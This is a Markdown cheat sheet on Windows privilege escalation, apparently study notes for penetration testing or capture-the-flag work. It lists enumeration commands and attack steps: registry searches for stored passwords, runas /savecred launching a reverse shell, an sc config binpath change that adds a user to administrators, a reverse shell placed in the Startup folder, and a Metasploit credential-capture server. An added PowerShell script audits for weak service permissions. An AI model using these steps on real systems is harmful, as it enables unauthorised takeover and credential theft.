# Windows Privilege Escalation

## Links
* [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
* [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
* [JAWS](https://github.com/411Hall/JAWS)

## Account Types

* __Administrator__ local & domain
* __Standard__ local & domain
* __Guest__
* __System__

## Enumeration

### Users & Groups
```sh
whoami /priv
net users
net users <username>
net localgroup
net localgroup <groupname>
query session
qwinsta
```

### Files
* [powershell](../../../../enumeration/windows/powershell.md)

### System
```sh
hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```
* Installed software
```sh
wmic product get name,version,vendor
```
* Services
```sh
wmic service list brief | findstr "Running"
```

## Exploit

### DLL Hijacking
* [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)

### Unquoted Service Path
* [unquoted service path](../../../../exploit/windows/docs/unqoted_path.md)

### Token Impersonation
* `SeImpersonatePrivilege` is required; check for it with `whoami /priv`
* Hot Potato works best on versions before Server 2019 and Windows 10 (version 1809)
* [Potatos](../../../../exploit/windows/docs/potatoes.md)

### Scheduled Tasks
* `schtasks`
* `Autoruns64.exe`

### MSI Elevated Installer
* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)

### Search for Credentials
```sh
cmdkey /list
```
* Use found credentials
```sh
runas /savecred /user:<user> reverse_shell.exe
```
* Keys containing passwords
```sh
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

### accesschk64 Permissions
* Check access to files and folders
```sh
accesschk64 -wvu "file.exe"
```
* If the service grants the `SERVICE_CHANGE_CONFIG` permission (note the required space after `binpath=`)
```sh
sc config <service> binpath= "net localgroup administrators user /add"
```
* [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md)
* Any other binary works as well: copy the compiled portable executable from `service_escalation` to the service's binary path, then restart the service.
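As an added audit example (not part of the original notes), the PowerShell script below finds the two weaknesses this section and the Unquoted Service Path section rely on: services whose DACL grants `SERVICE_CHANGE_CONFIG` (or a stronger write right) to a low-privileged principal, and services whose unquoted binary path contains a space. It assumes an elevated shell on the host being audited and parses the SDDL printed by `sc.exe sdshow`.

```powershell
# Added audit example, not from the original page: list services that an ordinary
# user could reconfigure, and services with an unquoted, space-containing path.
# Run from an elevated PowerShell on the host being audited.

# Service access-right bits: SDDL DC (0x2) is SERVICE_CHANGE_CONFIG; WD, WO, GA, GW
# (WRITE_DAC, WRITE_OWNER, GENERIC_ALL, GENERIC_WRITE) are also writable rights.
$WriteMask = 0x0002 -bor 0x00040000 -bor 0x00080000 -bor 0x10000000 -bor 0x40000000

# Well-known SIDs held by ordinary users: Everyone, Authenticated Users, Users, Interactive.
$LowPrivSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4')

function Get-WeakServiceAcl {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        # sc.exe sdshow prints the service security descriptor as an SDDL string.
        $sddl = (& sc.exe sdshow $svc.Name | Where-Object { $_.Trim() -match '^D:' }) -join ''
        if (-not $sddl) { continue }
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl.Trim())
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace -isnot [System.Security.AccessControl.QualifiedAce]) { continue }
            if ($ace.AceType -ne 'AccessAllowed') { continue }
            if (($ace.AccessMask -band $WriteMask) -eq 0) { continue }
            if ($LowPrivSids -notcontains $ace.SecurityIdentifier.Value) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                Principal = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value
                Mask      = '0x{0:X8}' -f $ace.AccessMask
                PathName  = $svc.PathName
            }
        }
    }
}

function Get-UnquotedServicePath {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if (-not $path -or $path.StartsWith('"')) { continue }
        # Isolate the executable part (up to the first .exe); a space in it outside
        # the trusted C:\Windows tree is what makes the path exploitable.
        if (-not ($path -match '^(?<exe>.*?\.exe)')) { continue }
        $exe = $Matches.exe
        if ($exe -match '\s' -and $exe -notmatch '^[A-Za-z]:\\Windows\\') {
            [pscustomobject]@{ Service = $svc.Name; PathName = $path }
        }
    }
}

Get-WeakServiceAcl      | Format-Table -AutoSize
Get-UnquotedServicePath | Format-Table -AutoSize
```

Any service reported by either function should have its DACL tightened (`sc.exe sdset`) or its path quoted before a local user can turn it into the escalation described above.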

### Startup Application
* Place a reverse shell executable in `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`; it runs at the next logon

### Password Mining
* Set up the Metasploit capture server
```sh
use auxiliary/server/capture/http_basic
set srvport 7777
set uripath pass
```
* Visit the capture site from the target to collect the entered credentials